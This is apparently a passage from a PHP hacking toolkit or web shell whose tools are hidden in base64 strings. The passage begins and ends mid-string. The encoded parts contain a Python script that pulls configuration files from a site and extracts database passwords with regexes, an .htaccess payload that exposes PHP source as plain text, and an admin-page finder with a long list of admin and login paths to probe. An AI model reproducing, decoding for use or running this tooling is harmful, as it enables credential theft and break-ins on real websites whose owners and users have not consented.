ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=";
$htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxhaW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=';
$pd = 'PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpc3RbJ2Zyb250J10gPSJhZG1pbg0KYWRtDQphZG1pbmNwDQphZG1jcA0KY3ANCm1vZGNwDQptb2RlcmF0b3JjcA0KYWRtaW5hcmUNCmFkbWlucw0KY3BhbmVsDQpjb250cm9scGFuZWwiOw0KJGxpc3RbJ2VuZCddID0gImFkbWluMS5waHANCmFkbWluMS5odG1sDQphZG1pbjIucGhwDQphZG1pbjIuaHRtbA0KeW9uZXRpbS5waHANCnlvbmV0aW0uaHRtbA0KeW9uZXRpY2kucGhwDQp5b25ldGljaS5odG1sDQpjY21zLw0KY2Ntcy9sb2dpbi5waHANCmNjbXMvaW5kZXgucGhwDQptYWludGVuYW5jZS8NCndlYm1hc3Rlci8NCmFkbS8NCmNvbmZpZ3VyYXRpb24vDQpjb25maWd1cmUvDQp3ZWJzdm4vDQphZG1pbi8NCmFkbWluL2FjY291bnQucGhwDQphZG1pbi9hY2NvdW50Lmh0bWwNCmFkbWluL2luZGV4LnBocA0KYWRtaW4vaW5kZXguaHRtbA0KYWRtaW4vbG9naW4ucGhwDQphZG1pbi9sb2dpbi5odG1sDQphZG1pbi9ob21lLnBocA0KYWRtaW4vY29udHJvbHBhbmVsLmh0bWwNCmFkbWluL2NvbnRyb2xwYW5lbC5waHANCmFkbWluLnBocA0KYWRtaW4uaHRtbA0KYWRtaW4vY3AucGhwDQphZG1pbi9jcC5odG1sDQpjcC5waHANCmNwLmh0bWwNCmFkbWluaXN0cmF0b3IvDQphZG1pbmlzdHJhdG9yL2luZGV4Lmh0bWwNCmFkbWluaXN0cmF0b3IvaW5kZXgucGhwDQphZG1pbmlzdHJhdG9yL2xvZ2luLmh0bWwNCmFkbWluaXN0cmF0b3IvbG9naW4ucGhwDQphZG1pbmlzdHJhdG9yL2FjY291bnQuaHRtbA0KYWRtaW5pc3RyYXRvci9hY2NvdW50LnBocA0KYWRtaW5pc3RyYXRvci5waHANCmFkbWluaXN0cmF0b3IuaHRtbA0KbG9naW4ucGhwDQpsb2dpbi5odG1sDQptb2RlbHNlYXJjaC9sb2dpbi5waHANCm1vZGVyYXRvci5waHANCm1vZGVyYXRvci5odG1sDQptb2RlcmF0b3IvbG9naW4ucGhwDQptb2RlcmF0b3IvbG9naW4uaHRtbA0KbW9kZXJhdG9yL2FkbWluLnBocA0KbW9kZXJhdG9yL2FkbWluLmh0bWwNCm1vZGVyYXRvci8NCmFjY291bnQucGhwDQphY2NvdW50Lmh0bWwNCmNvbnRyb2xwYW5lbC8NCmNvbnRyb2xwYW5lbC5waHANCmNvbnRyb2xwYW5lbC5odG1sDQphZG1pbmNvbnRyb2wucGhwDQphZG1pbmNvbnRyb2wuaHRtbA0KYWRtaW5wYW5lbC5waHANCmFkbWlucGFuZWwuaHRtbA0KYWRtaW4xLmFzcA0KYWRtaW4yLmFzcA0KeW9uZXRpbS5hc3ANCnlvbmV0aWNpLmFzcA0KYWRtaW4vYWNjb3VudC5hc3ANCmFkbWluL2luZGV4LmFzcA0KYWRtaW4vbG9naW4uYXNwDQphZG1pbi9ob21lLmFzcA0KYWRtaW4vY29udHJvbHBhbmVsLmFzcA0KYWRtaW4uYXNwDQphZG1pbi9jcC5hc3ANCmNwLmFzcA0KYWRtaW5pc3RyYXRvci9pbmRleC5hc3ANCmFkbWluaXN0cmF0b3IvbG9naW4uYXNwDQphZG1pbmlzdHJhdG9yL2FjY291bnQuYXNwDQphZG1pbmlzdHJhdG9yLmFzcA0KbG9naW4uYXNwDQptb2RlbHNlYXJjaC9sb2dpbi5hc3ANCm1vZGVyYXRvci5hc3ANCm1vZGVyYXRvci9sb2dpbi5hc3ANCm1vZGVyYXRvci9hZG1pbi5hc3ANCmFjY291bnQuYXNwDQpjb250cm9scGFuZWwuYXNwDQphZG1pbmNvbnRyb2wuYXNwDQphZG1pbnBhbmVsLmFzcA0KZmlsZWFkbWluLw0KZmlsZWFkbWluLnBocA0KZmlsZWFkbWluLmFzcA0KZmlsZWFkbWluLmh0bWwNCmFkbWluaXN0cmF0aW9uLw0KYWRtaW5pc3RyYXRpb24ucGhwDQphZG1pbmlzdHJhdGlvbi5odG1sDQpzeXNhZG1pbi5waHANCnN5c2FkbWluLmh0bWwNCnBocG15YWRtaW4vDQpteWFkbWluLw0Kc3lzYWRtaW4uYXNwDQpzeXNhZG1pbi8NCnVyLWFkbWluLmFzcA0KdXItYWRtaW4ucGhwDQp1ci1hZG1pbi5odG1sDQp1ci1hZG1pbi8NClNlcnZlci5waHANClNlcnZlci5odG1sDQpTZXJ2ZXIuYXNwDQpTZXJ2ZXIvDQp3cC1hZG1pbi8NCmFkbWluaXN0cjgucGhwDQphZG1pbmlzdHI4Lmh0bWwNCmFkbWluaXN0cjgvDQphZG1pbmlzdHI4LmFzcA0Kd2ViYWRtaW4vDQp3ZWJhZG1pbi5waHANCndlYmFkbWluLmFzcA0Kd2ViYWRtaW4uaHRtbA0KYWRtaW5pc3RyYXRpZS8NCmFkbWlucy8NCmFkbWlucy5waHANCmFkbWlucy5hc3ANCmFkbWlucy5odG1sDQphZG1pbmlzdHJpdmlhLw0KRGF0YWJhc2VfQWRtaW5pc3RyYXRpb24vDQpXZWJBZG1pbi8NCnVzZXJhZG1pbi8NCnN5c2FkbWlucy8NCmFkbWluMS8NCnN5c3RlbS1hZG1pbmlzdHJhdGlvbi8NCmFkbWluaXN0cmF0b3JzLw0KcGdhZG1pbi8NCmRpcmVjdGFkbWluLw0Kc3RhcmFkbWluLw0KU2VydmVyQWRtaW5pc3RyYXRvci8NClN5c0FkbWluLw0KYWRtaW5pc3Rlci8NCkxpdmVVc2VyX0FkbWluLw0Kc3lzLWFkbWluLw0KdHlwbzMvDQpwYW5lbC8NCmNwYW5lbC8NCmNQYW5lbC8NCmNwYW5lbF9maWxlLw0KcGxhdHpfbG9naW4vDQpyY0xvZ2luLw0KYmxvZ2luZGV4Lw0KZm9ybXNsb2dpbi8NCmF1dG9sb2dpbi8NCnN1cHBvcnRfbG9naW4vDQptZXRhX2xvZ2luLw0KbWFudWFsbG9naW4vDQpzaW1wbGVMb2dpbi8NCmxvZ2luZmxhdC8NCnV0aWxpdHlfbG9naW4vDQpzaG93bG9naW4vDQptZW1sb2dpbi8NCm1lbWJlcnMvDQpsb2dpbi1yZWRpcmVjdC8NCnN1Yi1sb2dpbi8NCndwLWxvZ2luLw0KbG9naW4xLw0KZGlyLWxvZ2luLw0KbG9naW5fZGIvDQp4bG9naW4vDQpzbWJsb2dpbi8NCmN1c3RvbWVyX2xvZ2luLw0KVXNlckxvZ2luLw0KbG9naW4tdXMvDQphY2N0X2xvZ2luLw0KYWRtaW5fYXJlYS8NCmJpZ2FkbWluLw0KcHJvamVjdC1hZG1pbnMvDQpwaHBwZ2FkbWluLw0KcHVyZWFkbWluLw0Kc3FsLWFkbWluLw0KcmFkbWluZC8NCm9wZW52cG5hZG1pbi8NCndpem15c3FsYWRtaW4vDQp2YWRtaW5kLw0KZXpzcWxpdGVhZG1pbi8NCmhwd2ViamV0YWRtaW4vDQpuZXdzYWRtaW4vDQphZG1pbnByby8NCkxvdHVzX0RvbWlub19BZG1pbi8NCmJiYWRtaW4vDQp2bWFpbGFkbWluLw0KSW5keV9hZG1pbi8NCmNjcDE0YWRtaW4vDQppcmMtbWFjYWRtaW4vDQpiYW5uZXJhZG1pbi8NCnNzaGFkbWluLw0KcGhwbGRhcGFkbWluLw0KbWFjYWRtaW4vDQphZG1pbmlzdHJhdG9yYWNjb3VudHMvDQphZG1pbjRfYWNjb3VudC8NCmFkbWluNF9jb2xvbi8NCnJhZG1pbmQtMS8NClN1cGVyLUFkbWluLw0KQWRtaW5Ub29scy8NCmNtc2FkbWluLw0KU3lzQWRtaW4yLw0KZ2xvYmVzX2FkbWluLw0KY2FkbWlucy8NCnBocFNRTGl0ZUFkbWluLw0KbmF2U2l0ZUFkbWluLw0Kc2VydmVyX2FkbWluX3NtYWxsLw0KbG9nb19zeXNhZG1pbi8NCnNlcnZlci8NCmRhdGFiYXNlX2FkbWluaXN0cmF0aW9uLw0KcG93ZXJfdXNlci8NCnN5c3RlbV9hZG1pbmlzdHJhdGlvbi8NCnNzX3Ztc19hZG1pbl9zbS8NCmFkbWluYXJlYS8NCmJiLWFkbWluLw0KYWRtaW5Mb2dpbi8NCnBhbmVsLWFkbWluaXN0cmFjaW9uLw0KaW5zdGFkbWluLw0KbWVtYmVyYWRtaW4vDQphZG1pbmlzdHJhdG9ybG9naW4vDQphZG1pbi9hZG1pbi5waHANCmFkbWluX2FyZWEvYWRtaW4ucGhwDQphZG1pbl9hcmVhL2xvZ2luLnBocA0Kc2l0ZWFkbWluL2xvZ2luLnBocA0Kc2l0ZWFkbWluL2luZGV4LnBocA0Kc2l0ZWFkbWluL2xvZ2luLmh0bWwNCmFkbWluL2FkbWluLmh0bWwNCmFkbWluX2FyZWEvaW5kZXgucGhwDQpiYi1hZG1pbi9pbmRleC5waHANCmJiLWFkbWluL2xvZ2luLnBocA0KYmItYWRtaW4vYWRtaW4ucGhwDQphZG1pbl9hcmVhL2xvZ2luLmh0bWwNCmFkbWluX2FyZWEvaW5kZXguaHRtbA0KYWRtaW5jcC9pbmRleC5hc3ANCmFkbWluY3AvbG9naW4uYXNwDQphZG1pbmNwL2luZGV4Lmh0bWwNCndlYmFkbWluL2luZGV4Lmh0bWwNCndlYmFkbWluL2FkbWluLmh0bWwNCndlYmFkbWluL2xvZ2luLmh0bWwNCmFkbWluL2FkbWluX2xvZ2luLmh0bWwNCmFkbWluX2xvZ2luLmh0bWwNCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLmh0bWwNCm5zdy9hZG1pbi9sb2dpbi5waHANCndlYmFkbWluL2xvZ2luLnBocA0KYWRtaW4vYWRtaW5fbG9naW4ucGhwDQphZG1pbl9sb2dpbi5waHANCmFkbWluX2FyZWEvYWRtaW4uaHRtbA0KcGFnZXMvYWRtaW4vYWRtaW4tbG9naW4ucGhwDQphZG1pbi9hZG1pbi1sb2dpbi5waHANCmFkbWluLWxvZ2luLnBocA0KYmItYWRtaW4vaW5kZXguaHRtbA0KYmItYWRtaW4vbG9naW4uaHRtbA0KYmItYWRtaW4vYWRtaW4uaHRtbA0KYWRtaW4vaG9tZS5odG1sDQpwYWdlcy9hZG1pbi9hZG1pbi1sb2dpbi5odG1sDQphZG1pbi9hZG1pbi1sb2dpbi5odG1sDQphZG1pbi1sb2dpbi5odG1sDQphZG1pbi9hZG1pbkxvZ2luLmh0bWwNCmFkbWluTG9naW4uaHRtbA0KaG9tZS5odG1sDQpyY2pha2FyL2FkbWluL2xvZ2luLnBocA0KYWRtaW5hcmVhL2luZGV4Lmh0bWwNCmFkbWluYXJlYS9hZG1pbi5odG1sDQp3ZWJhZG1pbi9pbmRleC5waHANCndlYmFkbWluL2FkbWluLnBocA0KdXNlci5odG1sDQptb2RlbHNlYXJjaC9sb2dpbi5odG1sDQphZG1pbmFyZWEvbG9naW4uaHRtbA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vaW5kZXguaHRtbA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vYWRtaW4uaHRtbA0KbW9kZWxzZWFyY2gvaW5kZXguaHRtbA0KbW9kZWxzZWFyY2gvYWRtaW4uaHRtbA0KYWRtaW5jb250cm9sL2xvZ2luLmh0bWwNCmFkbS9pbmRleC5odG1sDQphZG0uaHRtbA0KdXNlci5waHANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLnBocA0Kd3AtbG9naW4ucGhwDQphZG1pbkxvZ2luLnBocA0KYWRtaW4vYWRtaW5Mb2dpbi5waHANCmhvbWUucGhwDQphZG1pbmFyZWEvaW5kZXgucGhwDQphZG1pbmFyZWEvYWRtaW4ucGhwDQphZG1pbmFyZWEvbG9naW4ucGhwDQpwYW5lbC1hZG1pbmlzdHJhY2lvbi9pbmRleC5waHANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2FkbWluLnBocA0KbW9kZWxzZWFyY2gvaW5kZXgucGhwDQptb2RlbHNlYXJjaC9hZG1pbi5waHANCmFkbWluY29udHJvbC9sb2dpbi5waHANCmFkbS9hZG1sb2dpbnVzZXIucGhwDQphZG1sb2dpbnVzZXIucGhwDQphZG1pbjIvbG9naW4ucGhwDQphZG1pbjIvaW5kZXgucGhwDQphZG0vaW5kZXgucGhwDQphZG0ucGhwDQphZmZpbGlhdGUucGhwDQphZG1fYXV0aC5waHANCm1lbWJlcmFkbWluLnBocA0KYWRtaW5pc3RyYXRvcmxvZ2luLnBocA0KYWRtaW4vYWRtaW4uYXNwDQphZG1pbl9hcmVhL2FkbWluLmFzcA0KYWRtaW5fYXJlYS9sb2dpbi5hc3ANCmFkbWluX2FyZWEvaW5kZXguYXNwDQpiYi1hZG1pbi9pbmRleC5hc3ANCmJiLWFkbWluL2xvZ2luLmFzcA0KYmItYWRtaW4vYWRtaW4uYXNwDQpwYWdlcy9hZG1pbi9hZG1pbi1sb2dpbi5hc3ANCmFkbWluL2FkbWluLWxvZ2luLmFzcA0KYWRtaW4tbG9naW4uYXNwDQp1c2VyLmFzcA0Kd2ViYWRtaW4vaW5kZXguYXNwDQp3ZWJhZG1pbi9hZG1pbi5hc3ANCndlYmFkbWluL2xvZ2luLmFzcA0KYWRtaW4vYWRtaW5fbG9naW4uYXNwDQphZG1pbl9sb2dpbi5hc3ANCnBhbmVsLWFkbWluaXN0cmFjaW9uL2xvZ2luLmFzcA0KYWRtaW5Mb2dpbi5hc3ANCmFkbWluL2FkbWluTG9naW4uYXNwDQpob21lLmFzcA0KYWRtaW5hcmVhL2luZGV4LmFzcA0KYWRtaW5hcmVhL2FkbWluLmFzcA0KYWRtaW5hcmVhL2xvZ2luLmFzcA0KcGFuZWwtYWRtaW5pc3RyYWNpb24vaW5kZXguYXNwDQpwYW5lbC1hZG1pbmlzdHJhY2lvbi9hZG1pbi5hc3ANCm1vZGVsc2VhcmNoL2luZGV4LmFzcA0KbW9kZWxzZWFyY2gvYWRtaW4uYXNwDQphZG1pbmNvbnRyb2wvbG9naW4uYXNwDQphZG0vYWRtbG9naW51c2VyLmFzcA0KYWRtbG9naW51c2VyLmFzcA0KYWRtaW4yL2xvZ2luLmFzcA0KYWRtaW4yL2luZGV4LmFzcA0KYWRtL2luZGV4LmFzcA0KYWRtLmFzcA0KYWZmaWxpYXRlLmFzcA0KYWRtX2F1dGguYXNwDQptZW1iZXJhZG1pbi5hc3ANCmFkbWluaXN0cmF0b3Jsb2dpbi5hc3ANCnNpdGVhZG1pbi9sb2dpbi5hc3ANCnNpdGVhZG1pbi9pbmRleC5hc3ANCkFETUlOLw0KcGFuZWxkZWNvbnRyb2wvDQpsb2dpbi8NCmNtcy8NCmFkbW9uLw0KQURNT04vDQphZG1pbmlzdHJhZG9yLw0KQURNSU4vbG9naW4ucGhwDQpwYW5lbGMvDQpBRE1JTi9sb2dpbi5odG1sIjsNCmZ1bmN0aW9uIHRlbXBsYXRlKCkgew0KZWNobyAnDQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPkFkbWluIHBhZ2UgRmluZGVyIGJ5IGN5YmVyYmFnb3N0PC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5ew0KCWJhY2tncm91bmQ6ICMwMDA7DQoJbWFyZ2luOiAwOw0KCXBhZGRpbmc6IDA7DQoJcGFkZGluZy10b3A6IDEwcHg7DQoJY29sb3I6ICNGRkY7DQoJZm9udC1mYW1pbHk6IENhbGlicmk7DQoJZm9udC1zaXplOiAxM3B4Ow0KfQ0KYXsNCgljb2xvcjogI0ZGRjsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQoud3JhcHBlcnsNCgl3aWR0aDogMTAwMHB4Ow0KCW1hcmdpbjogMCBhdXRvOw0KfQ0KLnR1YmV7DQoJcGFkZGluZzogMTBweDsNCn0NCi5yZWR7DQoJd2lkdGg6IDk5OHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICNlNTIyMjQ7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogI2U1MjIyNA0KfQ0KLnJlZCBpbnB1dHsNCgliYWNrZ3JvdW5kOiAjMDAwOw0KCWJvcmRlcjogMXB4IHNvbGlkICNlNTIyMjQ7DQoJY29sb3I6ICNGRkY7DQp9DQouYmx1ZXsNCglmbG9hdDogbGVmdDsNCgl3aWR0aDogMTAwMHB4Ow0KCWJvcmRlcjogMXB4IHNvbGlkICMxZDdmYzM7DQoJYmFja2dyb3VuZDogIzE5MTkxOTsNCgljb2xvcjogIzFkN2ZjMzsNCn0NCi5ncmVlbnsNCglmbG9hdDogbGVmdD